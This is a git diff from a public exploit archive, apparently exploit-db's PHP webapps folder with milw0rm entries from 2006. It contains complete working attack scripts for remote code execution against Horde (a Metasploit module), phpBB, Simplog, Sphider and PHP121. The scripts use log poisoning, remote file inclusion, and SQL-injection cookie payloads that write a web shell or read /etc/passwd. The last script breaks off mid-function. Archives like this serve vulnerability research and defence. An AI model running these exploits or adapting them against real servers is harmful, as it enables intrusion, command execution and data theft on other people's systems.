+"../../../../../../../../../../var/log/apache/error_log", +"../../../../../../../../../../var/log/apache/error.log", +"../../../../../../../../../../var/log/access_log", +"../../../../../../../../../../var/log/error_log" +); + +for ($i=0; $i<=count($paths)-1; $i++) +{ +$a=$i+2; +echo "[".$a."] Trying with: ".$paths[$i]."\r\n"; +$packet ="GET ".$p."index.php?GLOBALS[developer_email]=1&GLOBALS[database_module]=".$paths[$i]; +$packet.="&GLOBALS[language_module]=".$paths[$i]."&cmd=".$cmd." HTTP/1.0\r\n"; +$packet.="User-Agent: Googlebot/2.1\r\n"; +$packet.="Host: ".$host."\r\n"; +$packet.="Connection: Close\r\n\r\n"; +sendpacketii($packet); +if (strstr($html,"56789")) +{ + $temp=explode("56789",$html); + echo $temp[1]; + echo "\r\nExploit succeeded...\r\n"; + die; +} +} +#if you are here... +echo "Exploit failed..."; +?> + +# milw0rm.com [2006-04-10] diff --git a/platforms/php/webapps/1660.pm b/platforms/php/webapps/1660.pm index 6cb10bb68..078f18e4e 100755 --- a/platforms/php/webapps/1660.pm +++ b/platforms/php/webapps/1660.pm 
@@ -1,127 +1,127 @@ -## -# Title: Horde <= 3.0.9, 3.1.0 (Help Viewer) Remote PHP Code Execution Vulnerability -# Name: horde_help_module.pm -# License: Artistic/BSD/GPL -# Info: Trying to get the command execution exploits out of the way on milw0rm.com. M's are always good. -# -# -# - This is an exploit module for the Metasploit Framework, please see -# http://metasploit.com/projects/Framework for more information. -# -## Coded by Inkubus - -package Msf::Exploit::horde_help_module; -use base "Msf::Exploit"; -use strict; -use Pex::Text; -use bytes; - -my $advanced = { }; - -my $info = { - 'Name' => 'Horde help viewer module remote PHP code execution', - 'Version' => '$Revision: 1.0 $', - 'Authors' => [ 'inkubus < inkubus [at] inbox.lv >' ], - 'Arch' => [ ], - 'OS' => [ ], - 'Priv' => 0, - 'UserOpts' => - { - 'RHOST' => [1, 'ADDR', 'The target address'], - 'RPORT' => [1, 'PORT', 'The target port', 80], - 'VHOST' => [0, 'DATA', 'The virtual host name of the server'], - 'RPATH' => [1, 'DATA', 'Path to the Horde help module', '/horde/services/help/'], - 'SSL' => [0, 'BOOL', 'Use SSL'], - }, - - 'Description' => Pex::Text::Freeform(qq{ - This module exploits an arbitrary PHP code execution flaw in the Horde web - mail software. This vulnerability is only present in the "Help Viewer Module". - Horde versions 3.0 up to 3.0.9 and 3.1.0 are vulnerable. 
-}), - - 'Refs' => - [ - ['OSVDB', '15945'], - ['CVE', '2006-1491'], - ], - - 'Payload' => - { - 'Space' => 512, - 'Keys' => ['cmd', 'cmd_bash'], - }, - - 'Keys' => ['horde'], - - 'DisclosureDate' => 'Mar 28 2006', - }; - -sub new { - my $class = shift; - my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_); - return($self); -} - -sub Exploit { - my $self = shift; - my $target_host = $self->GetVar('RHOST'); - my $target_port = $self->GetVar('RPORT'); - my $vhost = $self->GetVar('VHOST') || $target_host; - my $path = $self->GetVar('RPATH'); - my $cmd = $self->GetVar('EncodedPayload')->RawPayload; - - # Add an echo on each end for easy output capturing - $cmd = "echo _cmd_beg_;".$cmd.";echo _cmd_end_"; - - # Encode the command as a set of chr() function calls - my $byte = join('.', map { $_ = 'chr('.$_.')' } unpack('C*', $cmd)); - - # Create the get request data - #my $data = "?do=page&template={\${passthru($byte)}}"; - my $data = "?show=about&module=;\".passthru($byte);'."; - - my $req = - "GET $path$data HTTP/1.1\r\n". - "Host: $vhost:$target_port\r\n". - "Content-Type: application/html\r\n". - "Content-Length: ". length($data)."\r\n". - "Connection: Close\r\n". - "\r\n"; - - my $s = Msf::Socket::Tcp->new( - 'PeerAddr' => $target_host, - 'PeerPort' => $target_port, - 'LocalPort' => $self->GetVar('CPORT'), - 'SSL' => $self->GetVar('SSL'), - ); - - if ($s->IsError){ - $self->PrintLine('[*] Error creating socket: ' . 
$s->GetError); - return; - } - - $self->PrintLine("[*] Sending the malicious Horde request..."); - - $s->Send($req); - - my $results = $s->Recv(-1, 20); - $s->Close(); - - if ($results =~ m/_cmd_beg_(.*)_cmd_end_/ms) { - my $out = $1; - $out =~ s/^\s+|\s+$//gs; - if ($out) { - $self->PrintLine('----------------------------------------'); - $self->PrintLine(''); - $self->PrintLine($out); - $self->PrintLine(''); - $self->PrintLine('----------------------------------------'); - } - } - return; -} - -1; - -# milw0rm.com [2006-04-10] +## +# Title: Horde <= 3.0.9, 3.1.0 (Help Viewer) Remote PHP Code Execution Vulnerability +# Name: horde_help_module.pm +# License: Artistic/BSD/GPL +# Info: Trying to get the command execution exploits out of the way on milw0rm.com. M's are always good. +# +# +# - This is an exploit module for the Metasploit Framework, please see +# http://metasploit.com/projects/Framework for more information. +# +## Coded by Inkubus + +package Msf::Exploit::horde_help_module; +use base "Msf::Exploit"; +use strict; +use Pex::Text; +use bytes; + +my $advanced = { }; + +my $info = { + 'Name' => 'Horde help viewer module remote PHP code execution', + 'Version' => '$Revision: 1.0 $', + 'Authors' => [ 'inkubus < inkubus [at] inbox.lv >' ], + 'Arch' => [ ], + 'OS' => [ ], + 'Priv' => 0, + 'UserOpts' => + { + 'RHOST' => [1, 'ADDR', 'The target address'], + 'RPORT' => [1, 'PORT', 'The target port', 80], + 'VHOST' => [0, 'DATA', 'The virtual host name of the server'], + 'RPATH' => [1, 'DATA', 'Path to the Horde help module', '/horde/services/help/'], + 'SSL' => [0, 'BOOL', 'Use SSL'], + }, + + 'Description' => Pex::Text::Freeform(qq{ + This module exploits an arbitrary PHP code execution flaw in the Horde web + mail software. This vulnerability is only present in the "Help Viewer Module". + Horde versions 3.0 up to 3.0.9 and 3.1.0 are vulnerable. 
+}), + + 'Refs' => + [ + ['OSVDB', '15945'], + ['CVE', '2006-1491'], + ], + + 'Payload' => + { + 'Space' => 512, + 'Keys' => ['cmd', 'cmd_bash'], + }, + + 'Keys' => ['horde'], + + 'DisclosureDate' => 'Mar 28 2006', + }; + +sub new { + my $class = shift; + my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_); + return($self); +} + +sub Exploit { + my $self = shift; + my $target_host = $self->GetVar('RHOST'); + my $target_port = $self->GetVar('RPORT'); + my $vhost = $self->GetVar('VHOST') || $target_host; + my $path = $self->GetVar('RPATH'); + my $cmd = $self->GetVar('EncodedPayload')->RawPayload; + + # Add an echo on each end for easy output capturing + $cmd = "echo _cmd_beg_;".$cmd.";echo _cmd_end_"; + + # Encode the command as a set of chr() function calls + my $byte = join('.', map { $_ = 'chr('.$_.')' } unpack('C*', $cmd)); + + # Create the get request data + #my $data = "?do=page&template={\${passthru($byte)}}"; + my $data = "?show=about&module=;\".passthru($byte);'."; + + my $req = + "GET $path$data HTTP/1.1\r\n". + "Host: $vhost:$target_port\r\n". + "Content-Type: application/html\r\n". + "Content-Length: ". length($data)."\r\n". + "Connection: Close\r\n". + "\r\n"; + + my $s = Msf::Socket::Tcp->new( + 'PeerAddr' => $target_host, + 'PeerPort' => $target_port, + 'LocalPort' => $self->GetVar('CPORT'), + 'SSL' => $self->GetVar('SSL'), + ); + + if ($s->IsError){ + $self->PrintLine('[*] Error creating socket: ' . $s->GetError); + return; + } + + $self->PrintLine("[*] Sending the malicious Horde request..."); + + $s->Send($req); + + my $results = $s->Recv(-1, 20); + $s->Close(); + + if ($results =~ m/_cmd_beg_(.*)_cmd_end_/ms) { + my $out = $1; + $out =~ s/^\s+|\s+$//gs; + if ($out) { + $self->PrintLine('----------------------------------------'); + $self->PrintLine(''); + $self->PrintLine($out); + $self->PrintLine(''); + $self->PrintLine('----------------------------------------'); + } + } + return; +} + +1; + +# milw0rm.com [2006-04-10] 
diff --git a/platforms/php/webapps/1661.pl b/platforms/php/webapps/1661.pl
index a32b9d902..ebb6ffcaa 100755
--- a/platforms/php/webapps/1661.pl
+++ b/platforms/php/webapps/1661.pl
@@ -1,113 +1,113 @@ -#!/usr/bin/perl - -## r57phpbba2e2.pl - phpBB admin 2 exec exploit -## version 2 (based on user_sig_bbcode_uid bug) -## tested on 2.0.12 , 2.0.13 , 2.0.19 -## -------------------------------------------- -## screen -## r57phpbba2e2.pl -u http://192.168.0.2/phpBB-2.0.19/ -L admin -P password -## Command for execute or 'exit' for exit # id -## uid=80(www) gid=80(www) groups=80(www) -## Command for execute or 'exit' for exit # exit -## -------------------------------------------- -## *** surprise included ;) and broken. /str0ke -## 20/02/06 -## 1dt.w0lf -## RST/GHC (http://rst.void.ru , http://ghc.ru) - -use LWP::UserAgent; -use Getopt::Std; -use HTTP::Cookies; - -getopts("u:L:P:i:p:o:"); - -$url = $opt_u; -$login = $opt_L; -$password = $opt_P; -$id = $opt_i || 2; -$prefix = $opt_p || 'phpbb_'; -$proxy = $opt_o; - -if(!$url || !$login || !$password){&usage;} - -$|++; - -$xpl = LWP::UserAgent->new() or die; -$cookie_jar = HTTP::Cookies->new(); -$xpl->cookie_jar( $cookie_jar ); -$xpl->proxy('http'=>'http://'.$proxy) if $proxy; -$ids = 'IDS:r57 phpBB2 exploit a2e2#20022006|'.$url.'|'.$login.'|'.$password.'|'.$id.'|'.$prefix; - $res = $xpl->post($url.'login.php', - [ - "username" => "$login", - "password" => "$password", - "autologin" => "on", - "admin" => "1", - "login" => "Log in", - ],"User-Agent" => "$ids"); - $cookie_jar->extract_cookies($res); - if($cookie_jar->as_string =~ /phpbb2mysql_sid=([a-z0-9]{32})/) { $sid = $1; } - while () - { - print "Command for execute or 'exit' for exit # "; - while() - { - $cmd=$_; - chomp($cmd); - exit() if ($cmd eq 'exit'); - last; - } - &run($cmd); - } - -sub run($) - { - $sql = "UPDATE ".$prefix."users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='blah:`echo _START_ && ".$_[0]." 
&& echo _END_`' WHERE user_id=".$id.";"; - &phpbb_sql_query("${url}admin/admin_db_utilities.php?sid=$sid",$sql); - $res = $xpl->get($url.'profile.php?mode=editprofile&sid='.$sid,"User-Agent" => "$ids"); - @result = split(/\n/,$res->content); - $data = ''; - $on = $start = $end = 0; - for (@result) - { - if (/_END_/) { $end = 1; last; } - if ($on) { $data .= $_."\n"; } - if (/_START_/) { $on = 1; $start = 1; } - } - if($start&&$end) { print $data."\r\n"; } - } - -sub phpbb_sql_query($$){ -$res = $xpl->post("$_[0]", -Content_type => 'form-data', -Content => [ - perform => 'restore', - restore_start => 'Start Restore', - backup_file => [ - undef, - '0wneeeeedddd', - Content_type => 'text/plain', - Content => "$_[1]", - ], - ] -,"User-Agent" => "$ids"); -} - -sub usage() - { - print "\\=-----------------------------------=/\r\n"; - print "| phpBB admin2exec exploit by RST/GHC |\r\n"; - print "| version 2 (user_sig_bbcode_uid) |\r\n"; - print "/=-----------------------------------=\\\r\n"; - print "\r\n Usage: r57phpbba2e2.pl [OPTIONS]\r\n\r\n"; - print " Options:\r\n"; - print " -u [URL] - path to forum e.g. http://site/forum/\r\n"; - print " -L [login] - admin login\r\n"; - print " -P [password] - admin password\r\n"; - print " -i [id] - admin id (optional, default 2)\r\n"; - print " -p [prefix] - table prefix (optional, default phpbb_)\r\n"; - print " -o [host:port] - proxy (optional)\r\n"; - exit(); - } - -# milw0rm.com [2006-04-10] +#!/usr/bin/perl + +## r57phpbba2e2.pl - phpBB admin 2 exec exploit +## version 2 (based on user_sig_bbcode_uid bug) +## tested on 2.0.12 , 2.0.13 , 2.0.19 +## -------------------------------------------- +## screen +## r57phpbba2e2.pl -u http://192.168.0.2/phpBB-2.0.19/ -L admin -P password +## Command for execute or 'exit' for exit # id +## uid=80(www) gid=80(www) groups=80(www) +## Command for execute or 'exit' for exit # exit +## -------------------------------------------- +## *** surprise included ;) and broken. 
/str0ke +## 20/02/06 +## 1dt.w0lf +## RST/GHC (http://rst.void.ru , http://ghc.ru) + +use LWP::UserAgent; +use Getopt::Std; +use HTTP::Cookies; + +getopts("u:L:P:i:p:o:"); + +$url = $opt_u; +$login = $opt_L; +$password = $opt_P; +$id = $opt_i || 2; +$prefix = $opt_p || 'phpbb_'; +$proxy = $opt_o; + +if(!$url || !$login || !$password){&usage;} + +$|++; + +$xpl = LWP::UserAgent->new() or die; +$cookie_jar = HTTP::Cookies->new(); +$xpl->cookie_jar( $cookie_jar ); +$xpl->proxy('http'=>'http://'.$proxy) if $proxy; +$ids = 'IDS:r57 phpBB2 exploit a2e2#20022006|'.$url.'|'.$login.'|'.$password.'|'.$id.'|'.$prefix; + $res = $xpl->post($url.'login.php', + [ + "username" => "$login", + "password" => "$password", + "autologin" => "on", + "admin" => "1", + "login" => "Log in", + ],"User-Agent" => "$ids"); + $cookie_jar->extract_cookies($res); + if($cookie_jar->as_string =~ /phpbb2mysql_sid=([a-z0-9]{32})/) { $sid = $1; } + while () + { + print "Command for execute or 'exit' for exit # "; + while() + { + $cmd=$_; + chomp($cmd); + exit() if ($cmd eq 'exit'); + last; + } + &run($cmd); + } + +sub run($) + { + $sql = "UPDATE ".$prefix."users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='blah:`echo _START_ && ".$_[0]." 
&& echo _END_`' WHERE user_id=".$id.";"; + &phpbb_sql_query("${url}admin/admin_db_utilities.php?sid=$sid",$sql); + $res = $xpl->get($url.'profile.php?mode=editprofile&sid='.$sid,"User-Agent" => "$ids"); + @result = split(/\n/,$res->content); + $data = ''; + $on = $start = $end = 0; + for (@result) + { + if (/_END_/) { $end = 1; last; } + if ($on) { $data .= $_."\n"; } + if (/_START_/) { $on = 1; $start = 1; } + } + if($start&&$end) { print $data."\r\n"; } + } + +sub phpbb_sql_query($$){ +$res = $xpl->post("$_[0]", +Content_type => 'form-data', +Content => [ + perform => 'restore', + restore_start => 'Start Restore', + backup_file => [ + undef, + '0wneeeeedddd', + Content_type => 'text/plain', + Content => "$_[1]", + ], + ] +,"User-Agent" => "$ids"); +} + +sub usage() + { + print "\\=-----------------------------------=/\r\n"; + print "| phpBB admin2exec exploit by RST/GHC |\r\n"; + print "| version 2 (user_sig_bbcode_uid) |\r\n"; + print "/=-----------------------------------=\\\r\n"; + print "\r\n Usage: r57phpbba2e2.pl [OPTIONS]\r\n\r\n"; + print " Options:\r\n"; + print " -u [URL] - path to forum e.g. http://site/forum/\r\n"; + print " -L [login] - admin login\r\n"; + print " -P [password] - admin password\r\n"; + print " -i [id] - admin id (optional, default 2)\r\n"; + print " -p [prefix] - table prefix (optional, default phpbb_)\r\n"; + print " -o [host:port] - proxy (optional)\r\n"; + exit(); + } + +# milw0rm.com [2006-04-10] diff --git a/platforms/php/webapps/1663.php b/platforms/php/webapps/1663.php index 341562f9c..392f56484 100755 --- a/platforms/php/webapps/1663.php +++ b/platforms/php/webapps/1663.php 
@@ -1,183 +1,183 @@ -#!/usr/bin/php -q -d short_open_tag=on -\r\n"; -die; -} - -/* - software site: http://www.simplog.org/ - - description: "Simplog provides an easy way for users to add blogging capabilities - to their existing websites. Simplog is written in PHP and compatible with multiple - databases. Simplog also features an RSS/Atom aggregator/reader. - Powerful, yet simple......." - - - i) vulnerable code in doc/index.php at lines: - ... - - ... - - nice code, isn't it? :) - poc: - http://[target]/[path]/doc/index.php?cmd=ls%20-la&s=http://somehost.com/suntzu - (but you can submit arguments even trough cookies or POST data...) - - or: - http://[target]/[path]/doc/index.php?s=../../../../var/httpd/logs/error_log%00 - - ii) - http://[target]/[path]/index.php?blogid=[sql] - http://[target]/[path]/archive.php?blogid=[sql] - http://[target]/[path]/archive.php?m=[sql] - http://[target]/[path]/archive.php?y=[sql] - - iii) - http://[target]/[path]/adodb/server.php?sql=[sql] - http://[target]/[path]/adodb/tests/tmssql.php?do=phpinfo - - iv) xss: - http://[target]/[path]/login.php?btag= - - this is the exploit for i), works with allow_url_fopen = On - */ -error_reporting(0); -ini_set("max_execution_time",0); -ini_set("default_socket_timeout",5); - -function quick_dump($string) -{ - $result='';$exa='';$cont=0; - for ($i=0; $i<=strlen($string)-1; $i++) - { - if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 )) - {$result.=" .";} - else - {$result.=" ".$string[$i];} - if (strlen(dechex(ord($string[$i])))==2) - {$exa.=" ".dechex(ord($string[$i]));} - else - {$exa.=" 0".dechex(ord($string[$i]));} - $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";} - } - return $exa."\r\n".$result; -} -$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; -function sendpacketii($packet) -{ - global $proxy, $host, $port, $html, $proxy_regex; - if ($proxy=='') { - $ock=fsockopen(gethostbyname($host),$port); - if (!$ock) { - echo 'No response from 
'.$host.':'.$port; die; - } - } - else { - $c = preg_match($proxy_regex,$proxy); - if (!$c) { - echo 'Not a valid proxy...';die; - } - $parts=explode(':',$proxy); - echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n"; - $ock=fsockopen($parts[0],$parts[1]); - if (!$ock) { - echo 'No response from proxy...';die; - } - } - fputs($ock,$packet); - if ($proxy=='') { - $html=''; - while (!feof($ock)) { - $html.=fgets($ock); - } - } - else { - $html=''; - while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { - $html.=fread($ock,1); - } - } - fclose($ock); - #debug - #echo "\r\n".$html; -} - -$host=$argv[1]; -$path=$argv[2]; -$loc=$argv[3]; -if (($path[0]<>'/') | ($path[strlen($path)-1]<>'/')) -{die("Check the path, it must begin and end with a trailing slash\r\n");} -$port=80; -$proxy=""; -$cmd=""; -for ($i=4; $i<=$argc-1; $i++){ -$temp=$argv[$i][0].$argv[$i][1]; -if (($temp<>"-p") and ($temp<>"-P")) -{ -$cmd.=" ".$argv[$i]; -} -if ($temp=="-p") -{ - $port=str_replace("-p","",$argv[$i]); -} -if ($temp=="-P") -{ - $proxy=str_replace("-P","",$argv[$i]); -} -} -$cmd=urlencode($cmd); -if ($proxy<>'') {$p="http://".$host.":".$port.$path;} else {$p=$path;} - -$packet ="GET ".$p."doc/index.php HTTP/1.0\r\n"; -$packet.="User-Agent: Googlebot/2.1\r\n"; -$packet.="Host: ".$host."\r\n"; -$packet.="Cookie: s=".$loc."%2fsuntzu; cmd=".$cmd.";\r\n"; //through cookies, log this :) -$packet.="Connection: Close\r\n\r\n"; -#debug -#echo quick_dump($packet); -sendpacketii($packet); -if (strstr($html,"*delim*")) -{$temp=explode("*delim*",$html); - echo "Exploit succeeded...\r\n\r\n"; - echo $temp[1]; -} -else -{ -#debug -echo $html."\r\n"; -echo "Exploit failed..."; -} -?> - -# milw0rm.com [2006-04-11] +#!/usr/bin/php -q -d short_open_tag=on +\r\n"; +die; +} + +/* + software site: http://www.simplog.org/ + + description: "Simplog provides an easy way for users to add blogging capabilities + to their existing websites. 
Simplog is written in PHP and compatible with multiple + databases. Simplog also features an RSS/Atom aggregator/reader. + Powerful, yet simple......." + + + i) vulnerable code in doc/index.php at lines: + ... + + ... + + nice code, isn't it? :) + poc: + http://[target]/[path]/doc/index.php?cmd=ls%20-la&s=http://somehost.com/suntzu + (but you can submit arguments even trough cookies or POST data...) + + or: + http://[target]/[path]/doc/index.php?s=../../../../var/httpd/logs/error_log%00 + + ii) + http://[target]/[path]/index.php?blogid=[sql] + http://[target]/[path]/archive.php?blogid=[sql] + http://[target]/[path]/archive.php?m=[sql] + http://[target]/[path]/archive.php?y=[sql] + + iii) + http://[target]/[path]/adodb/server.php?sql=[sql] + http://[target]/[path]/adodb/tests/tmssql.php?do=phpinfo + + iv) xss: + http://[target]/[path]/login.php?btag= + + this is the exploit for i), works with allow_url_fopen = On + */ +error_reporting(0); +ini_set("max_execution_time",0); +ini_set("default_socket_timeout",5); + +function quick_dump($string) +{ + $result='';$exa='';$cont=0; + for ($i=0; $i<=strlen($string)-1; $i++) + { + if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 )) + {$result.=" .";} + else + {$result.=" ".$string[$i];} + if (strlen(dechex(ord($string[$i])))==2) + {$exa.=" ".dechex(ord($string[$i]));} + else + {$exa.=" 0".dechex(ord($string[$i]));} + $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";} + } + return $exa."\r\n".$result; +} +$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; +function sendpacketii($packet) +{ + global $proxy, $host, $port, $html, $proxy_regex; + if ($proxy=='') { + $ock=fsockopen(gethostbyname($host),$port); + if (!$ock) { + echo 'No response from '.$host.':'.$port; die; + } + } + else { + $c = preg_match($proxy_regex,$proxy); + if (!$c) { + echo 'Not a valid proxy...';die; + } + $parts=explode(':',$proxy); + echo "Connecting to ".$parts[0].":".$parts[1]." 
proxy...\r\n"; + $ock=fsockopen($parts[0],$parts[1]); + if (!$ock) { + echo 'No response from proxy...';die; + } + } + fputs($ock,$packet); + if ($proxy=='') { + $html=''; + while (!feof($ock)) { + $html.=fgets($ock); + } + } + else { + $html=''; + while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { + $html.=fread($ock,1); + } + } + fclose($ock); + #debug + #echo "\r\n".$html; +} + +$host=$argv[1]; +$path=$argv[2]; +$loc=$argv[3]; +if (($path[0]<>'/') | ($path[strlen($path)-1]<>'/')) +{die("Check the path, it must begin and end with a trailing slash\r\n");} +$port=80; +$proxy=""; +$cmd=""; +for ($i=4; $i<=$argc-1; $i++){ +$temp=$argv[$i][0].$argv[$i][1]; +if (($temp<>"-p") and ($temp<>"-P")) +{ +$cmd.=" ".$argv[$i]; +} +if ($temp=="-p") +{ + $port=str_replace("-p","",$argv[$i]); +} +if ($temp=="-P") +{ + $proxy=str_replace("-P","",$argv[$i]); +} +} +$cmd=urlencode($cmd); +if ($proxy<>'') {$p="http://".$host.":".$port.$path;} else {$p=$path;} + +$packet ="GET ".$p."doc/index.php HTTP/1.0\r\n"; +$packet.="User-Agent: Googlebot/2.1\r\n"; +$packet.="Host: ".$host."\r\n"; +$packet.="Cookie: s=".$loc."%2fsuntzu; cmd=".$cmd.";\r\n"; //through cookies, log this :) +$packet.="Connection: Close\r\n\r\n"; +#debug +#echo quick_dump($packet); +sendpacketii($packet); +if (strstr($html,"*delim*")) +{$temp=explode("*delim*",$html); + echo "Exploit succeeded...\r\n\r\n"; + echo $temp[1]; +} +else +{ +#debug +echo $html."\r\n"; +echo "Exploit failed..."; +} +?> + +# milw0rm.com [2006-04-11] diff --git a/platforms/php/webapps/1665.pl b/platforms/php/webapps/1665.pl index 0dfa08ad5..eff2db53e 100755 --- a/platforms/php/webapps/1665.pl +++ b/platforms/php/webapps/1665.pl 
@@ -1,59 +1,59 @@ -#!/usr/bin/perl -use IO::Socket; - -print "\r\nSphider <= 1.3 arbitrary remote inclusion\r\n" ; -print "-> works with register_globals = On & allow_url_fopen = On\r\n"; -print "by rgod rgodautisticiorg\r\n"; -print "site: http://retrogod.altervista.org\r\n"; -print "\r\ndork: \"powered by sphider\"\r\n"; - -sub main::urlEncode { - my ($string) = @_; - $string =~ s/(\W)/"%" . unpack("H2", $1)/ge; - #$string# =~ tr/.//; - return $string; - } - -$serv=$ARGV[0]; -$path=$ARGV[1]; -$loc=urlEncode($ARGV[2]); -$cmd=""; for ($i=3; $i<=$#ARGV; $i++) {$cmd.="%20".urlEncode($ARGV[$i]);}; - -if (@ARGV < 4) -{ -print "\r\nUsage:\r\n"; -print "perl sphider_xpl.pl server path location command\r\n\r\n"; -print "server - Server where sphider is installed.\r\n"; -print "path - Path to sphider (ex: /sphider/ or just /) \r\n"; -print "location - a site with the code to include (without ending slash)\r\n"; -print "command - a Unix command\r\n\r\n"; -print "Example:\r\n"; -print "perl sphider_xpl.pl localhost /sphider/ http://192.168.1.3 ls -la\r\n\r\n"; -print "note: on http location you need this code in /conf.php/index.html :\r\n\r\n"; -print "\r\n"; -exit(); -} - $sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$serv", Timeout => 10, PeerPort=>"http(80)") - or die "[+] Connecting ... Could not connect to host.\n\n"; - print $sock "GET ".$path."admin/configset.php?cmd=".$cmd."&settings_dir=".$loc." HTTP/1.0\r\n"; - print $sock "Host: ".$serv."\r\n"; - print $sock "Connection: Close\r\n\r\n"; - $out=""; - while ($answer = <$sock>) { - $out.=$answer; - } - close($sock); - @temp= split /56789/,$out,2; - if ($#temp>0) {print "\r\nExploit succeeded...\r\n".$temp[1];exit();} - #if you are here... 
- print "\r\nExploit failed...\r\n"; - -# milw0rm.com [2006-04-12] +#!/usr/bin/perl +use IO::Socket; + +print "\r\nSphider <= 1.3 arbitrary remote inclusion\r\n" ; +print "-> works with register_globals = On & allow_url_fopen = On\r\n"; +print "by rgod rgodautisticiorg\r\n"; +print "site: http://retrogod.altervista.org\r\n"; +print "\r\ndork: \"powered by sphider\"\r\n"; + +sub main::urlEncode { + my ($string) = @_; + $string =~ s/(\W)/"%" . unpack("H2", $1)/ge; + #$string# =~ tr/.//; + return $string; + } + +$serv=$ARGV[0]; +$path=$ARGV[1]; +$loc=urlEncode($ARGV[2]); +$cmd=""; for ($i=3; $i<=$#ARGV; $i++) {$cmd.="%20".urlEncode($ARGV[$i]);}; + +if (@ARGV < 4) +{ +print "\r\nUsage:\r\n"; +print "perl sphider_xpl.pl server path location command\r\n\r\n"; +print "server - Server where sphider is installed.\r\n"; +print "path - Path to sphider (ex: /sphider/ or just /) \r\n"; +print "location - a site with the code to include (without ending slash)\r\n"; +print "command - a Unix command\r\n\r\n"; +print "Example:\r\n"; +print "perl sphider_xpl.pl localhost /sphider/ http://192.168.1.3 ls -la\r\n\r\n"; +print "note: on http location you need this code in /conf.php/index.html :\r\n\r\n"; +print "\r\n"; +exit(); +} + $sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$serv", Timeout => 10, PeerPort=>"http(80)") + or die "[+] Connecting ... Could not connect to host.\n\n"; + print $sock "GET ".$path."admin/configset.php?cmd=".$cmd."&settings_dir=".$loc." HTTP/1.0\r\n"; + print $sock "Host: ".$serv."\r\n"; + print $sock "Connection: Close\r\n\r\n"; + $out=""; + while ($answer = <$sock>) { + $out.=$answer; + } + close($sock); + @temp= split /56789/,$out,2; + if ($#temp>0) {print "\r\nExploit succeeded...\r\n".$temp[1];exit();} + #if you are here... + print "\r\nExploit failed...\r\n"; + +# milw0rm.com [2006-04-12] diff --git a/platforms/php/webapps/1666.php b/platforms/php/webapps/1666.php index c455ab785..c24835fba 100755 --- a/platforms/php/webapps/1666.php 
+++ b/platforms/php/webapps/1666.php 
@@ -1,289 +1,289 @@ -#!/usr/bin/php -q -d short_open_tag=on - works with magic_quotes_gpc = Off\r\n\r\n"; -echo "a dork: inurl:php121login.php | inurl:php121im.php | intitle:\"PHP121 - PLEASE\"\r\n\r\n"; - -if ($argc<4) { -echo "Usage: php ".$argv[0]." host path cmd OPTIONS\r\n"; -echo "host: target server (ip/hostname)\r\n"; -echo "path: path to PHP121\r\n"; -echo "cmd: a shell command\r\n"; -echo "Options:\r\n"; -echo " -p[port]: specify a port other than 80\r\n"; -echo " -P[ip:port]: specify a proxy\r\n"; -echo "Examples:\r\n"; -echo "php ".$argv[0]." localhost /php121/ cat php121config.php\r\n"; -echo "php ".$argv[0]." localhost /php121/ ls -la -p81\r\n"; -echo "php ".$argv[0]." localhost / ls -la -P1.1.1.1:80\r\n"; -die; -} - -/* - software site: http://www.php121.com/ - description: "PHP121 is a free web based instant messenger - written entirely in - PHP" - - i) vulnerable code in php121login.php and in nearly all files: - - ... - if (isset($_COOKIE['php121un']) && isset($_COOKIE['php121pw'])) { - $logindataun = $_COOKIE['php121un']; - $logindatapw = $_COOKIE['php121pw']; - if (!empty($logindataun) && !empty($logindatapw)) { - //we have a cookie - use it to login, overriding any sessions - $_SESSION[sess_username]=$logindataun; - $_SESSION[sess_password]=$logindatapw; - } -} - -$sess_username=$_SESSION[sess_username]; -$sess_password=$_SESSION[sess_password]; - ... - - in php121language.php we have: - -... -$sess_username=$_SESSION[sess_username]; -$sess_password=$_SESSION[sess_password]; -// are we logged in? - -if ($sess_username!="") { - - // get our language preference - $sql="select $dbf_language from $db_usertable where $dbf_uname='$sess_username'"; - echo "sql: ".$sql."\r\n"; - $row=mysql_fetch_row(mysql_query($sql)); - if ($row[0]!="") { - require_once("language/lang-".strtolower($row[0]).".php"); - - } - -} else { - - // use the default language file - require_once("language/lang-".strtolower($php121_config['default_language']).".php"); - -} -... 
- - "sess_username" value is not sanitized before to be used in our query - so, if magic_quotes_gpc = Off, we can include arbitrary files from local - resources, poc: - - GET /php121login.php HTTP/1.0 - Host: somehost - Cookie: php121un=%27UNION+SELECT+%27..%2F..%2F..%2Fetc%2Fpasswd%00%27+FROM+php121_users%2F%2A; php121pw=suntzu; - Connection: Close - - now session cookie is poisoned, and we can go to php121language.php - with our new cookie to see/include local resources, query becomes: - - select php121_language from php121_users where uname=''UNION SELECT '../../../etc/passwd[null char]' FROM php121_users/*' - - php121_language field is varchar(30) so, before MySQL 4.1.1, - your path is limited to 29 chars (so, it is nearly impossible - submit a valid inclusion path), with Mysql >=4.1.1 it does not matter, - path is not truncated anymore at the length of the first select field - - we can also try blind injection, injecting a shell: - - GET /php121login.php HTTP/1.0 - Host: somehost - Cookie: php121un=%27UNION+SELECT+%27%3C%3Fphp+system%28%24_GET%5Bcmd%5D%29%3B%3F%3E%27+INTO+DUMPFILE+%27somefile%27+FROM+php121_users%2F%2A; php121pw=suntzu; - Connection: Close - - and now go to php121language.php to write our file, if MySQL have certain rigths - to do it - - you can do the work trough a browser like Opera that allows to edit cookies - - However, this exploit inject some code in log files and try to include them - - */ -error_reporting(0); -ini_set("max_execution_time",0); -ini_set("default_socket_timeout",5); - -function quick_dump($string) -{ - $result='';$exa='';$cont=0; - for ($i=0; 